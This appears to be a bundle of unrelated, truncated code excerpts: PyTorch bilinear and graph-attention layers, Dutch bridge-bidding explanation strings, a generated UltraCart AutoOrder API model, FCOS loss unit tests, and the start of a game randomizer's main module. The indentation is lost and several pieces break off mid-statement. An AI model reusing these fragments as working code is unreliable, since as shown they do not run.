class EmbedBilinear(nn.Module):
"""
binlinear module but reduce dimenion first to reduce complexity.
"""
def __init__(self, embed_size, in1_features, in2_features, out_features, bias = False):
super(EmbedBilinear, self).__init__()
self.embed_size = embed_size
self.in1_features = in1_features
self.in2_features = in2_features
self.out_features = out_features
self.use_bias = bias
self.left_embed_layer = nn.Linear(in_features= in1_features, out_features = embed_size, bias = bias)
self.right_embed_layer = nn.Linear(in_features= in2_features, out_features = embed_size, bias = bias)
self.Bilinear = nn.Bilinear(in1_features= embed_size, in2_features = embed_size, out_features = out_features, bias= bias)
self.reset_parameters()
def reset_parameters(self):
self.left_embed_layer.reset_parameters()
self.right_embed_layer.reset_parameters()
self.Bilinear.reset_parameters()
def forward(self, in1, in2):
embed1 = self.left_embed_layer(in1)
embed2 = self.right_embed_layer(in2)
return self.Bilinear(embed1, embed2)
def __repr__(self):
return "EmbedBilinear Layer: in1_features={}, in2_features={}, out_features={}, embed_size={}".format(
self.in1_features, self.in2_features, self.out_features, self.embed_size
)
class BiInteractionLayer(nn.Module):
def __init__(self, in1_features, in2_features, out_features, embed_size, intermediate_size= None, activation = F.relu, use_bias = True):
"""
:param in1_features:
:param in2_features:
:param out_features:
:param embed_size: embed size specific embedding vector size of input features
:param intermediate: a list specify intermediate size in mlp
"""
super(BiInteractionLayer, self).__init__()
self.in1_features= in1_features
self.in2_features = in2_features
self.out_features = out_features
self.embed_size = embed_size
self.embed_layer_1 = nn.Linear(in1_features, embed_size, bias = True)
self.embed_layer_2 = nn.Linear(in2_features, embed_size, bias = True)
self.activation = activation
self.bias= use_bias
self.interaction = nn.ModuleList()
if not intermediate_size:
self.interaction.append(nn.Linear(embed_size * 2, out_features, bias= True))
else:
self.interaction.append(nn.Linear(embed_size * 2, intermediate_size[0], bias= True))
for i in range(1, len(intermediate_size)):
self.interaction.append(nn.Linear(intermediate_size[i - 1], intermediate_size[i], bias= True))
self.interaction.append(nn.Linear(intermediate_size[-1], out_features, bias= True))
self.num_layers= len(self.interaction)
self.reset_parameters()
def reset_parameters(self):
self.embed_layer_1.reset_parameters()
self.embed_layer_2.reset_parameters()
for layer in self.interaction:
layer.reset_parameters()
def forward(self, in1, in2):
embed1 = self.activation(self.embed_layer_1(in1))
embed2 = self.activation(self.embed_layer_2(in2))
embed_concat = torch.cat([embed1, embed2], -1)
for layer in self.interaction:
embed_concat = self.activation(layer(embed_concat))
return embed_concat
def extra_repr(self):
return "Multi-layer perception: in1_features: %s, in2_features: %s, out_features: %s, bias: %s, layers: %s, activation: %s" \
%(self.in1_features, self.in2_features, self.out_features, self.bias, self.num_layers, self.activation)
class MLPGraphAttentionLayer(BaseGraphAttentionLayer):
"""
Improved GAT layer, similar to https://arxiv.org/abs/1710.10903
"""
def __init__(self, in_features, out_features, dropout, alpha, activation, num_basis = 5):
super(MLPGraphAttentionLayer, self).__init__()
self.dropout = dropout
self.in_features = in_features
self.out_features = out_features
self.alpha | |
u ook niet doubleren.
Dus als u geen lange klaverkaart heeft, of niet genoeg honneurs is het soms beter gewoon te passen.
'''
if state == 'StaymanPa2SAminMulti':
uitleg = '''
U heeft zowel een vierkaart harten als een vierkaart schoppen.
Met Stayman vroeg uw partner naar uw hoge kleuren, daar antwoordde u 2♥ op, omdat u uw partner wilde laten weten dat u mogelijk ook nog een schoppen kaart kon hebben naast de minimaal 4 harten.
Dus nu uw partner met 2SA aangeeft dat hij / zij geen harten heeft, en dus schoppen, weet u dat jullie een fit hebben in de schoppen.
En doordat uw partner 2SA heeft geboden weet u dat uw partner 8/9 punten heeft en dus net niet genoeg voor de manch.
Uw partner vraagt nu aan u of u genoeg heeft om naar de manch te gaan, maar omdat u maar 15 punten heeft is dat net niet genoeg voor de manch.
Dus u biedt 3♠.
'''
if state == 'StaymanPa2SAmaxMulti':
uitleg = '''
U heeft zowel een vierkaart harten als een vierkaart schoppen.
Met Stayman vroeg uw partner naar uw hoge kleuren, waarop u 2♥ antwoordde, omdat u uw partner wilde laten weten dat u mogelijk ook nog een schoppen kaart kon hebben naast de minimaal 4 harten.
Dus nu uw partner met 2SA aangeeft dat hij / zij geen harten heeft, en dus schoppen, weet u dat jullie een fit hebben in de schoppen.
En doordat uw partner 2SA heeft geboden weet u dat uw partner 8/9 punten heeft en dus net niet genoeg voor de manch.
Uw partner vraagt nu aan u of u genoeg heeft om naar de manch te gaan, u heeft genoeg punten om de manch te halen.
Dus u biedt 4♠.
'''
if state == 'StaymanPa2SA':
uitleg = '''
Uw partner verteld u dat hij / zij een andere vierkaart dan u heeft, want met 2♣ beloofde uw partner een vierkaart hoog, maar hij / zij ontkent uw vierkaart.
Wat betekend dat uw partner de andere kleur heeft. Met 2SA verteld uw partner nog iets, namelijk dat hij / zij 8/9 punten bezit.
En vraagt aan u of u genoeg punten heeft om de manch te halen. Daarom biedt u de manch met een maximale hand en past u met een minimale.
'''
if state == 'StaymanPa3SAMulti':
uitleg = '''
U heeft zowel een vierkaart harten als een vierkaart schoppen.
Met Stayman vroeg uw partner naar uw hoge kleuren, waarop u 2♥ antwoordde, omdat u uw partner wilde laten weten dat u mogelijk ook nog een schoppen kaart kon hebben naast de minimaal 4 harten.
Dus nu uw partner met 3SA aangeeft dat hij / zij geen harten heeft, en dus schoppen, weet u dat jullie een fit hebben.
En doordat uw partner 3SA heeft geboden weet u ook dat de manch erin zit.
Dus u biedt 4♠, want een manch in de hoge kleuren is beter dan een manch in sans.
'''
if state == 'OpJacoby':
uitleg = '''
Uw tegenstanders bieden Jacoby en zijn op zoek naar het juiste contract voor wat ze kunnen spelen,
de kans dat u en uw partner een contract gaan maken is dan erg klein,
dat betekent niet dat u geen informatie aan uw partner kunt geven.
Uw tegenstander heeft Jacoby geboden, daarmee geeft hij niet de geboden kleur aan,
dus dit is een ideaal moment om veilig een doublet tussen te bieden,
aangezien de 1SA-openaar nooit gaat passen, en het doublet dus geen waarde heeft.
Dus als u een goede kaart in de geboden kleur heeft is dit de ideale situatie om dat aan uw partner te laten weten,
door te doubleren.
'''
if state == 'AnswerJacoby':
uitleg = '''
Uw partner weet dat uw laagste kaart een doubleton is, en dat u 15-17 punten heeft.
Samen 8 kaarten heet een fit (met een fit kunt u in die kleur spelen), dus minimaal 2 + 5 is bijna een fit.
Als jullie een (bijna) fit hebben kunnen jullie beter in die kleur spelen dan het risico van SA te nemen,
daarom is Jacoby bedacht, en daarom kan uw partner dit ook al bieden vanaf 0 punten,
met de voorwaarde van een vijfkaart in een van de hoge kleuren, ♥ en ♠.
Omdat u liever heeft dat de tegenstanders de minste punten zien, en dus de minste honneurs,
heeft u het liefst dat de 1SA openaar speelt,
daar heeft de heer Jacoby iets op bedacht, als uw partner, de kleur onder de kleur die hij / zij eigenlijk zou willen bieden bied,
kan u daarna de kleur boven de kleur van uw partner bieden, en is het spel in uw hand, die van de openaar.
'''
if state == 'AfterTransferPass':
uitleg = '''
Toen u Jacoby bood deed u dat met de intentie om uw partner uw langste kleur te laten weten.
Als u dat gedaan heeft en niets meer te vertellen heeft aan uw partner kunt u gerust passen.
'''
if state == 'AfterTransder2SA':
uitleg = '''
Toen u Jacoby bood deed u dat met de intentie om uw partner uw langste kleur te laten weten.
Maar u heeft 8/9 punten, wat betekend dat er mogelijk nog een manch in zit!
En als er mogelijk nog een manch in zit mag u dat niet laten varen,
dus moet u aan uw partner "overleggen" of hij denkt dat er een manch in zit.
Dat doet u door 2Sa te bieden.
'''
if state == 'AfterTransfer3SA':
uitleg = '''
U partner bood als eerste 1SA dat betekent dat hij / zij 15-17 punten heeft.
U wilde aan uw partner laten weten dat u een vijfkaart had, wat een goed iets is maar nu moet u ook laten weten hoeveel punten u heeft.
U heeft 10 punten, en uw partner minimaal 15.
10 + 15 = 25
25 punten is genoeg voor de manch, nu is nog de vraag of u liever een manch in 3SA heeft of in uw kleur.
Uw partner weet dat u een vijfkaart heeft in die kleur dus het heeft geen zin die kleur nog een keer te bieden.
Daarom kunt u 3SA bieden, als uw partner wel een driekaart in uw kleur heeft en jullie dus een fit hebben,
bied uw partner nog de manch in die kleur.
Heeft uw partner dit niet, dan past uw partner.
'''
if state == 'AfterTransferManchinClr':
uitleg = '''
Uw partner opende 1SA, wat betekent dat uw partner 15-17 punten heeft,
maar het betekent ook dat uw partners laagste kleur minimaal 2 kaarten bevat.
Dus als u een zeskaart heeft, heeft u altijd fit, nu heeft u eerst net<NAME> geboden om aan te geven dat u een vijfkaart heeft.
Maar u heeft geen vijfkaart, u heeft een zeskaart, en uw partner weet dat nog niet.
Uw partner heeft ook 15 punten, wat betekend dat als u meer dan 10 punten heeft, jullie samen 25 punten hebben.
En 25 is genoeg voor de manch.
Dus jullie hebben een fit om een kleur in te spelen, en jullie hebben genoeg punten om de manch te spelen.
Dan kunt u dus gewoon de manch bieden.
'''
if state == 'AfterTransferInviteinClr':
uitleg = '''
Uw partner opende 1SA, wat betekend dat uw partner 15-17 punten heeft,
maar het betekent ook dat uw partners laagste kleur minimaal 2 kaarten bevat.
Dus als u een zeskaart heeft, heeft u altijd fit, nu heeft u eerst net<NAME> geboden om aan te geven dat u een vijfkaart heeft.
Maar u heeft geen vijfkaart, u heeft een zeskaart, en uw partner weet dat nog niet.
| |
# coding: utf-8
"""
UltraCart Rest API V2
UltraCart REST API Version 2 # noqa: E501
OpenAPI spec version: 2.0.0
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class AutoOrder(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'auto_order_code': 'str',
'auto_order_oid': 'int',
'cancel_after_next_x_orders': 'int',
'cancel_downgrade': 'bool',
'cancel_upgrade': 'bool',
'canceled_by_user': 'str',
'canceled_dts': 'str',
'completed': 'bool',
'credit_card_attempt': 'int',
'disabled_dts': 'str',
'enabled': 'bool',
'failure_reason': 'str',
'items': 'list[AutoOrderItem]',
'next_attempt': 'str',
'original_order': 'Order',
'original_order_id': 'str',
'override_affiliate_id': 'int',
'rebill_orders': 'list[Order]',
'rotating_transaction_gateway_code': 'str',
'status': 'str'
}
attribute_map = {
'auto_order_code': 'auto_order_code',
'auto_order_oid': 'auto_order_oid',
'cancel_after_next_x_orders': 'cancel_after_next_x_orders',
'cancel_downgrade': 'cancel_downgrade',
'cancel_upgrade': 'cancel_upgrade',
'canceled_by_user': 'canceled_by_user',
'canceled_dts': 'canceled_dts',
'completed': 'completed',
'credit_card_attempt': 'credit_card_attempt',
'disabled_dts': 'disabled_dts',
'enabled': 'enabled',
'failure_reason': 'failure_reason',
'items': 'items',
'next_attempt': 'next_attempt',
'original_order': 'original_order',
'original_order_id': 'original_order_id',
'override_affiliate_id': 'override_affiliate_id',
'rebill_orders': 'rebill_orders',
'rotating_transaction_gateway_code': 'rotating_transaction_gateway_code',
'status': 'status'
}
def __init__(self, auto_order_code=None, auto_order_oid=None, cancel_after_next_x_orders=None, cancel_downgrade=None, cancel_upgrade=None, canceled_by_user=None, canceled_dts=None, completed=None, credit_card_attempt=None, disabled_dts=None, enabled=None, failure_reason=None, items=None, next_attempt=None, original_order=None, original_order_id=None, override_affiliate_id=None, rebill_orders=None, rotating_transaction_gateway_code=None, status=None): # noqa: E501
"""AutoOrder - a model defined in Swagger""" # noqa: E501
self._auto_order_code = None
self._auto_order_oid = None
self._cancel_after_next_x_orders = None
self._cancel_downgrade = None
self._cancel_upgrade = None
self._canceled_by_user = None
self._canceled_dts = None
self._completed = None
self._credit_card_attempt = None
self._disabled_dts = None
self._enabled = None
self._failure_reason = None
self._items = None
self._next_attempt = None
self._original_order = None
self._original_order_id = None
self._override_affiliate_id = None
self._rebill_orders = None
self._rotating_transaction_gateway_code = None
self._status = None
self.discriminator = None
if auto_order_code is not None:
self.auto_order_code = auto_order_code
if auto_order_oid is not None:
self.auto_order_oid = auto_order_oid
if cancel_after_next_x_orders is not None:
self.cancel_after_next_x_orders = cancel_after_next_x_orders
if cancel_downgrade is not None:
self.cancel_downgrade = cancel_downgrade
if cancel_upgrade is not None:
self.cancel_upgrade = cancel_upgrade
if canceled_by_user is not None:
self.canceled_by_user = canceled_by_user
if canceled_dts is not None:
self.canceled_dts = canceled_dts
if completed is not None:
self.completed = completed
if credit_card_attempt is not None:
self.credit_card_attempt = credit_card_attempt
if disabled_dts is not None:
self.disabled_dts = disabled_dts
if enabled is not None:
self.enabled = enabled
if failure_reason is not None:
self.failure_reason = failure_reason
if items is not None:
self.items = items
if next_attempt is not None:
self.next_attempt = next_attempt
if original_order is not None:
self.original_order = original_order
if original_order_id is not None:
self.original_order_id = original_order_id
if override_affiliate_id is not None:
self.override_affiliate_id = override_affiliate_id
if rebill_orders is not None:
self.rebill_orders = rebill_orders
if rotating_transaction_gateway_code is not None:
self.rotating_transaction_gateway_code = rotating_transaction_gateway_code
if status is not None:
self.status = status
@property
def auto_order_code(self):
"""Gets the auto_order_code of this AutoOrder. # noqa: E501
Unique code assigned to this auto order # noqa: E501
:return: The auto_order_code of this AutoOrder. # noqa: E501
:rtype: str
"""
return self._auto_order_code
@auto_order_code.setter
def auto_order_code(self, auto_order_code):
"""Sets the auto_order_code of this AutoOrder.
Unique code assigned to this auto order # noqa: E501
:param auto_order_code: The auto_order_code of this AutoOrder. # noqa: E501
:type: str
"""
self._auto_order_code = auto_order_code
@property
def auto_order_oid(self):
"""Gets the auto_order_oid of this AutoOrder. # noqa: E501
Auto order object identifier # noqa: E501
:return: The auto_order_oid of this AutoOrder. # noqa: E501
:rtype: int
"""
return self._auto_order_oid
@auto_order_oid.setter
def auto_order_oid(self, auto_order_oid):
"""Sets the auto_order_oid of this AutoOrder.
Auto order object identifier # noqa: E501
:param auto_order_oid: The auto_order_oid of this AutoOrder. # noqa: E501
:type: int
"""
self._auto_order_oid = auto_order_oid
@property
def cancel_after_next_x_orders(self):
"""Gets the cancel_after_next_x_orders of this AutoOrder. # noqa: E501
Cancel this auto order after X additional rebills # noqa: E501
:return: The cancel_after_next_x_orders of this AutoOrder. # noqa: E501
:rtype: int
"""
return self._cancel_after_next_x_orders
@cancel_after_next_x_orders.setter
def cancel_after_next_x_orders(self, cancel_after_next_x_orders):
"""Sets the cancel_after_next_x_orders of this AutoOrder.
Cancel this auto order after X additional rebills # noqa: E501
:param cancel_after_next_x_orders: The cancel_after_next_x_orders of this AutoOrder. # noqa: E501
:type: int
"""
self._cancel_after_next_x_orders = cancel_after_next_x_orders
@property
def cancel_downgrade(self):
"""Gets the cancel_downgrade of this AutoOrder. # noqa: E501
True if the auto order was canceled because the customer purchased a downgrade item # noqa: E501
:return: The cancel_downgrade of this AutoOrder. # noqa: E501
:rtype: bool
"""
return self._cancel_downgrade
@cancel_downgrade.setter
def cancel_downgrade(self, cancel_downgrade):
"""Sets the cancel_downgrade of this AutoOrder.
True if the auto order was canceled because the customer purchased a downgrade item # noqa: E501
:param cancel_downgrade: The cancel_downgrade of this AutoOrder. # noqa: E501
:type: bool
"""
self._cancel_downgrade = cancel_downgrade
@property
def cancel_upgrade(self):
"""Gets the cancel_upgrade of this AutoOrder. # noqa: E501
True if the auto order was canceled because the customer purchased an upgrade item # noqa: E501
:return: The cancel_upgrade of this AutoOrder. # noqa: E501
:rtype: bool
"""
return self._cancel_upgrade
@cancel_upgrade.setter
def cancel_upgrade(self, cancel_upgrade):
"""Sets the cancel_upgrade of this AutoOrder.
True if the auto order was canceled because the customer purchased an upgrade item # noqa: E501
:param cancel_upgrade: The cancel_upgrade of this AutoOrder. # noqa: E501
:type: bool
"""
self._cancel_upgrade = cancel_upgrade
@property
def canceled_by_user(self):
"""Gets the canceled_by_user of this AutoOrder. # noqa: E501
The user that canceled the auto order # noqa: E501
:return: The canceled_by_user of this AutoOrder. # noqa: E501
:rtype: str
"""
return self._canceled_by_user
@canceled_by_user.setter
def canceled_by_user(self, canceled_by_user):
"""Sets the canceled_by_user of this AutoOrder.
The user that canceled the auto order # noqa: E501
:param canceled_by_user: The canceled_by_user of this AutoOrder. # noqa: E501
:type: str
"""
self._canceled_by_user = canceled_by_user
@property
def canceled_dts(self):
"""Gets the canceled_dts of this AutoOrder. # noqa: E501
The date/time that the auto order was canceled # noqa: E501
:return: The canceled_dts of this AutoOrder. # noqa: E501
:rtype: str
"""
return self._canceled_dts
@canceled_dts.setter
def canceled_dts(self, canceled_dts):
"""Sets the canceled_dts of this AutoOrder.
The date/time that the auto order was canceled # noqa: E501
:param canceled_dts: The canceled_dts of this AutoOrder. # noqa: E501
:type: str
"""
self._canceled_dts = canceled_dts
@property
def completed(self):
"""Gets the completed of this AutoOrder. # noqa: E501
True if the auto order ran successfully to completion # noqa: E501
:return: The completed of this AutoOrder. # noqa: E501
:rtype: bool
"""
return self._completed
@completed.setter
def completed(self, completed):
"""Sets the completed of this AutoOrder.
True if the auto order ran successfully to completion # noqa: E501
:param completed: The completed of this AutoOrder. # noqa: E501
:type: bool
"""
self._completed = completed
@property
def credit_card_attempt(self):
"""Gets the credit_card_attempt of this AutoOrder. # noqa: E501
The number of credit card attempts that have taken place # noqa: E501
:return: The credit_card_attempt of this AutoOrder. # noqa: E501
:rtype: int
"""
return self._credit_card_attempt
@credit_card_attempt.setter
def credit_card_attempt(self, credit_card_attempt):
"""Sets the credit_card_attempt of this AutoOrder.
The number of credit card attempts that have taken place # noqa: E501
:param credit_card_attempt: The credit_card_attempt of this AutoOrder. # noqa: E501
:type: int
"""
self._credit_card_attempt = credit_card_attempt
@property
def disabled_dts(self):
"""Gets the disabled_dts of this AutoOrder. # noqa: E501
The date/time the auto order was disabled due to failed rebills # noqa: E501
:return: The disabled_dts of this AutoOrder. # noqa: E501
:rtype: str
"""
return self._disabled_dts
@disabled_dts.setter
def disabled_dts(self, disabled_dts):
"""Sets the disabled_dts of this AutoOrder.
The date/time the auto order was disabled due to failed rebills # noqa: E501
:param disabled_dts: The disabled_dts of this AutoOrder. # noqa: E501
:type: str
"""
self._disabled_dts = disabled_dts
@property
def enabled(self):
"""Gets the enabled of this AutoOrder. # noqa: E501
True if this auto order is enabled # noqa: E501
:return: The enabled of this AutoOrder. # noqa: E501
:rtype: bool
"""
return self._enabled
@enabled.setter
def enabled(self, enabled):
"""Sets the enabled of this AutoOrder.
True if this auto order is enabled # noqa: E501
:param enabled: The enabled of this AutoOrder. # noqa: E501
:type: bool
"""
self._enabled = enabled
@property
def failure_reason(self):
"""Gets the failure_reason of this AutoOrder. # noqa: E501
The reason this auto order | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from pathlib import Path
from typing import Optional
import pytest
import torch
import torch.nn.functional as F
from torch import Tensor
from combustion.nn import FCOSDecoder, FCOSLoss
from combustion.util import alpha_blend, apply_colormap
from combustion.vision import visualize_bbox
class TestFCOSLoss:
@pytest.mark.parametrize(
"height,width,stride,indexing",
[
pytest.param(8, 8, 1, "hw"),
pytest.param(8, 8, 2, "hw"),
pytest.param(10, 8, 2, "hw"),
pytest.param(10, 8, 2, "xy"),
],
)
def test_create_coordinate_grid(self, height, width, stride, indexing):
grid = FCOSLoss.coordinate_grid(height, width, stride, indexing)
assert tuple(grid.shape[-2:]) == (height, width)
assert grid.shape[0] == 2
assert torch.allclose(grid[:, 0, 0], torch.tensor([stride / 2, stride / 2]))
expected = torch.tensor([width, height]).float().mul_(stride).sub_(stride / 2)
if indexing == "hw":
expected = expected.roll(1)
assert torch.allclose(grid[:, -1, -1], expected)
@pytest.mark.parametrize("inclusive", ["lower", "upper", "both"])
def test_assign_boxes_to_level(self, inclusive):
bounds = (
(-1, 64),
(64, 128),
(128, 256),
(256, 512),
(512, 10000000),
)
bounds = torch.tensor(bounds)
batch_size = 2
bbox = (
torch.tensor([0, 0, 1, 1])
.unsqueeze_(0)
.repeat(len(bounds), 1)
.mul_(bounds[..., 1].unsqueeze(-1))
.clamp_max_(1024)
)
bbox = torch.cat([torch.tensor([0, 0, 10, 10]).unsqueeze_(0), bbox], dim=0)
bbox = bbox.unsqueeze(0).repeat(batch_size, 1, 1)
assignments = FCOSLoss.assign_boxes_to_levels(bbox, bounds, inclusive)
has_assignment = assignments.any(dim=-1)
assert has_assignment.all(), "one or more boxes was not assigned a level"
diag = torch.eye(bbox.shape[-2] - 1, bounds.shape[-2]).bool()
upper = torch.cat((diag[0:1], diag), dim=-2)
lower = torch.cat((diag, diag[-1:]), dim=-2)
both = upper.logical_or(lower)
if inclusive == "lower":
expected = lower
elif inclusive == "upper":
expected = upper
elif inclusive == "both":
expected = both
else:
raise ValueError(f"{inclusive}")
assert (expected == assignments).all()
@pytest.mark.parametrize(
"stride,center_radius,size_target",
[
pytest.param(1, None, (10, 10)),
pytest.param(2, None, (5, 5)),
pytest.param(2, 1, (5, 5)),
pytest.param(2, 10, (10, 10)),
pytest.param(1, 2, (15, 15)),
pytest.param(1, None, (10, 15)),
pytest.param(1, None, (10, 15)),
],
)
def test_bbox_to_mask(self, stride, center_radius, size_target):
bbox = torch.tensor(
[
[0, 0, 9, 9],
[2, 2, 5, 5],
[1, 1, 2, 2],
]
)
result = FCOSLoss.bbox_to_mask(bbox, stride, size_target, center_radius)
assert isinstance(result, Tensor)
assert result.shape == torch.Size([bbox.shape[-2], *size_target])
for box, res in zip(bbox, result):
center_x = (box[0] + box[2]).true_divide(2)
center_y = (box[1] + box[3]).true_divide(2)
radius_x = (box[2] - box[0]).true_divide(2)
radius_y = (box[3] - box[1]).true_divide(2)
if center_radius is not None:
x1 = center_x - center_radius * stride
x2 = center_x + center_radius * stride
y1 = center_y - center_radius * stride
y2 = center_y + center_radius * stride
else:
x1 = center_x - radius_x
x2 = center_x + radius_x
y1 = center_y - radius_y
y2 = center_y + radius_y
x1.clamp_min_(center_x - radius_x)
x2.clamp_max_(center_x + radius_x)
y1.clamp_min_(center_y - radius_y)
y2.clamp_max_(center_y + radius_y)
h = torch.arange(res.shape[-2], dtype=torch.float, device=box.device)
w = torch.arange(res.shape[-1], dtype=torch.float, device=box.device)
mesh = torch.stack(torch.meshgrid(h, w), 0).mul_(stride).add_(stride / 2)
lower_bound = torch.stack([x1, y1]).view(2, 1, 1)
upper_bound = torch.stack([x2, y2]).view(2, 1, 1)
mask = (mesh >= lower_bound).logical_and_(mesh <= upper_bound).all(dim=-3)
pos_region = res[mask]
assert res.any()
assert pos_region.all()
assert res.sum() - pos_region.sum() == 0
@pytest.mark.parametrize(
"size_target,stride",
[
pytest.param((15, 15), 1),
pytest.param((10, 10), 2),
pytest.param((16, 16), 4),
],
)
def test_create_regression_target(self, size_target, stride):
bbox = torch.tensor(
[
[0, 0, 9, 9],
[2, 3, 8, 7],
]
).mul_(stride)
result = FCOSLoss.create_regression_target(bbox, stride, size_target)
assert isinstance(result, Tensor)
assert result.shape == torch.Size([bbox.shape[-2], 4, *size_target])
for box, res in zip(bbox, result):
h1, w1, h2, w2 = box[1], box[0], box[3], box[2]
hs1 = h1.floor_divide(stride)
ws1 = w1.floor_divide(stride)
hs2 = h2.floor_divide(stride)
ws2 = w2.floor_divide(stride)
pos_region = res[..., hs1:hs2, ws1:ws2]
if pos_region.numel():
assert (pos_region >= 0).all()
assert pos_region.max() <= box.max()
def discretize(x):
return x.float().floor_divide(stride).mul_(stride).add_(stride / 2)
# left
assert res[0, hs1, ws1] == stride / 2, "left target at top left corner"
assert res[0, hs2, ws1] == stride / 2, "left target at bottom left corner"
assert res[0, hs1, ws2] == discretize(w2 - w1), "left target at top right corner"
assert res[0, hs2, ws2] == discretize(w2 - w1), "left target at bottom right corner"
# top
assert res[1, hs1, ws1] == stride / 2, "top target at top left corner"
assert res[1, hs2, ws1] == discretize(h2 - h1), "top target at bottom left corner"
assert res[1, hs1, ws2] == stride / 2, "top target at top right corner"
assert res[1, hs2, ws2] == discretize(h2 - h1), "top target at bottom right corner"
# right
assert res[2, hs1, ws1] == w2 - w1 - stride / 2, "right target at top left corner"
assert res[2, hs2, ws1] == w2 - w1 - stride / 2, "right target at bottom left corner"
assert res[2, hs1, ws2] == stride / 2, "right target at top right corner"
assert res[2, hs2, ws2] == stride / 2, "right target at bottom right corner"
# bottom
assert res[3, hs1, ws1] == h2 - h1 - stride / 2, "right target at top left corner"
assert res[3, hs2, ws1] == stride / 2, "right target at bottom left corner"
assert res[3, hs1, ws2] == h2 - h1 - stride / 2, "right target at top right corner"
assert res[3, hs2, ws2] == stride / 2, "right target at bottom right corner"
@pytest.mark.parametrize(
"stride,center_radius,size_target",
[
pytest.param(1, None, (10, 10)),
pytest.param(1, 1, (15, 15)),
],
)
def test_create_classification_target(self, stride, center_radius, size_target):
bbox = torch.tensor(
[
[0, 0, 9, 9],
[3, 4, 8, 6],
[4, 4, 6, 6],
]
)
cls = torch.tensor([0, 0, 1]).unsqueeze_(-1)
mask = FCOSLoss.bbox_to_mask(bbox, stride, size_target, center_radius)
num_classes = 2
result = FCOSLoss.create_classification_target(bbox, cls, mask, num_classes, size_target)
assert isinstance(result, Tensor)
assert result.shape == torch.Size([num_classes, *size_target])
@pytest.mark.parametrize(
"stride,center_radius,size_target",
[
pytest.param(1, None, (10, 10)),
pytest.param(1, 1, (15, 15)),
],
)
def test_create_target_for_level(self, stride, center_radius, size_target):
bbox = torch.tensor(
[
[0, 0, 9, 9],
[3, 4, 8, 6],
[4, 4, 6, 6],
]
)
cls = torch.tensor([0, 0, 1]).unsqueeze_(-1)
num_classes = 2
cls, reg, centerness = FCOSLoss.create_target_for_level(
bbox, cls, num_classes, stride, size_target, (-1, 64), center_radius
)
assert cls.shape == torch.Size([num_classes, *size_target])
assert reg.shape == torch.Size([4, *size_target])
assert centerness.shape == torch.Size([1, *size_target])
# TODO expand on this test
assert centerness.max() <= 1.0
assert ((centerness >= 0) | (centerness == -1)).all()
@pytest.mark.parametrize("center_radius", [None, 1])
def test_create_targets(self, center_radius):
num_classes = 2
target_bbox = torch.randint(0, 100, (2, 10, 4))
target_cls = torch.randint(0, num_classes, (2, 10, 1))
strides = (8, 16, 32, 64, 128)
base_size = 512
sizes: Tuple[Tuple[int, int], ...] = tuple((base_size // stride,) * 2 for stride in strides) # type: ignore
criterion = FCOSLoss(strides, num_classes)
criterion.create_targets(target_bbox, target_cls, sizes)
def test_compute_loss(self):
target_bbox = torch.tensor(
[
[0, 0, 9, 9],
[3, 4, 8, 6],
[4, 4, 6, 6],
[32, 32, 88, 88],
]
)
target_cls = torch.tensor([0, 0, 1, 0]).unsqueeze_(-1)
num_classes = 2
strides = (8, 16, 32, 64, 128)
base_size = 512
sizes = [(base_size // stride,) * 2 for stride in strides]
pred_cls = [torch.rand(num_classes, *size, requires_grad=True) for size in sizes]
pred_reg = [torch.rand(4, *size, requires_grad=True).mul(512).round() for size in sizes]
pred_centerness = [torch.rand(1, *size, requires_grad=True) for size in sizes]
criterion = FCOSLoss(strides, num_classes)
cls_loss, reg_loss, centerness_loss = criterion.compute_from_box_target(
pred_cls, pred_reg, pred_centerness, target_bbox, target_cls
)
assert isinstance(cls_loss, Tensor)
assert isinstance(reg_loss, Tensor)
assert isinstance(centerness_loss, Tensor)
assert cls_loss.numel() == 1
assert reg_loss.numel() == 1
assert centerness_loss.numel() == 1
loss = cls_loss + reg_loss + centerness_loss
loss.backward()
def test_call(self):
target_bbox = torch.tensor(
[
[
[0, 0, 9, 9],
[3, 4, 8, 6],
[-1, -1, -1, -1],
],
[
[32, 32, 88, 88],
[-1, -1, -1, -1],
[-1, -1, -1, -1],
],
[
[-1, -1, -1, -1],
[-1, -1, -1, -1],
[-1, -1, -1, -1],
],
]
)
target_cls = torch.tensor(
[
[0, 1, -1],
[0, -1, -1],
[-1, -1, -1],
]
).unsqueeze_(-1)
batch_size = target_bbox.shape[0]
num_classes = 2
strides = (8, 16, 32, 64, 128)
base_size = 512
sizes = [(base_size // stride,) * 2 for stride in strides]
pred_cls = [torch.rand(batch_size, num_classes, *size, requires_grad=True) for size in sizes]
pred_reg = [torch.rand(batch_size, 4, *size, requires_grad=True).mul(512).round() for size in sizes]
pred_centerness = [torch.rand(batch_size, 1, *size, requires_grad=True) for size in sizes]
criterion = FCOSLoss(strides, num_classes)
cls_loss, reg_loss, centerness_loss = criterion(pred_cls, pred_reg, pred_centerness, target_bbox, target_cls)
assert isinstance(cls_loss, Tensor)
assert isinstance(reg_loss, Tensor)
assert isinstance(centerness_loss, Tensor)
assert cls_loss.numel() == 1
assert reg_loss.numel() == 1
assert centerness_loss.numel() == 1
loss = cls_loss + reg_loss + centerness_loss
assert not loss.isnan().any()
| |
from collections import OrderedDict
import copy
import hashlib
import io
import itertools
import logging
import os, os.path
import platform
import random
import shutil
import subprocess
import sys
import struct
import time
import zipfile
from World import World
from Spoiler import Spoiler
from Rom import Rom
from Patches import patch_rom
from Cosmetics import patch_cosmetics
from DungeonList import create_dungeons
from Fill import distribute_items_restrictive, ShuffleError
from Item import Item
from ItemPool import generate_itempool
from Hints import buildGossipHints
from Utils import default_output_path, is_bundled, subprocess_args, data_path
from version import __version__
from N64Patch import create_patch_file, apply_patch_file
from SettingsList import setting_infos, logic_tricks
from Rules import set_rules, set_shop_rules
from Plandomizer import Distribution
from Search import Search, RewindableSearch
from EntranceShuffle import set_entrances
from LocationList import set_drop_location_names
class dummy_window():
def __init__(self):
pass
def update_status(self, text):
pass
def update_progress(self, val):
pass
def main(settings, window=dummy_window()):
start = time.process_time()
logger = logging.getLogger('')
old_tricks = settings.allowed_tricks
settings.load_distribution()
# compare pointers to lists rather than contents, so even if the two are identical
# we'll still log the error and note the dist file overrides completely.
if old_tricks and old_tricks is not settings.allowed_tricks:
logger.error('Tricks are set in two places! Using only the tricks from the distribution file.')
for trick in logic_tricks.values():
